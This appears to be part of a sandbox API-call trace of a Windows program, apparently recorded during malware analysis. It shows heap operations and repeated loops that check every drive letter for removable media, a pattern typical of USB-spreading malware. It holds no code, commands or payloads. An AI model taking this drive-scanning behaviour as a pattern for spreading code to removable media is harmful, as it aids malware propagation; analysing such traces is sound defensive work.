[0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0209.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.462] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.462] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.462] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.463] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.463] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.463] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.463] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.463] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.464] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.464] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.464] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.464] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.465] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.465] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.465] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.465] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.465] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.466] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.466] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.466] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.467] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.467] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.467] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.467] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.467] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.468] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.468] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0209.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0209.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0209.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0209.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0209.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0209.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0209.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0209.470] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0209.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.471] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.471] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0209.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.471] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.471] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.472] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.472] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.472] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.802] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.803] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.803] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.803] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.803] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.803] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.804] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.804] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.804] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.804] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.804] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.804] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.805] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.805] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.805] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.805] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.805] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.806] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.806] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.806] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.806] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.806] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0209.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.874] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0209.874] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0209.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.874] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0209.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0209.875] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0209.875] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.875] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0209.875] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.875] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.875] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.876] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.876] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.876] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0209.876] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0209.876] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.876] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.877] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.877] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.877] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.877] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.877] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.877] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.878] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.878] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.878] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.878] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.878] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.879] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.879] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.879] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.879] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.879] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.880] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.880] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.880] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.880] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.880] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.881] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.881] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.881] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.882] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0209.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0209.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0209.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0209.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0209.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0209.883] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0209.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0209.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0209.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0209.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0209.883] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0209.883] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0209.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.884] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0209.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.884] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.884] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.884] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.884] RtlAllocateHeap 